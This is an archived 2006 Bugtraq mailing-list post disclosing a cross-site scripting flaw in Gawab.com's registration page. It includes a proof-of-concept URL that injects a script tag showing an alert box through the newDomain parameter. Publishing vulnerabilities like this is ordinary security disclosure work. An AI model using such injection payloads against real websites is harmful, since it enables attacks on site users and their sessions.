[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Gawab.com Register Xss Bugtraq
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Gawab.com Register Xss Bugtraq
- From: rootter@xxxxxxxxxxxxx
- Date: 15 May 2006 11:59:33 -0000
Script: Gawab.com Mail Services Portal System
Version: ?
Language: PHP
Problem: Xss
Vendor: http://www.HackMaster.Us
Discovered by: rootter(at)hackmaster(dot)us
Example:
http://gawab.com/webfront/register.php?formAction=start&newDomain=i%20found%20a%20xss%20vuln.%20%20%3Cscript%3Ealert(%22Security%20testing%20by%20R00TT3R%20:)%22);%3C/script%3E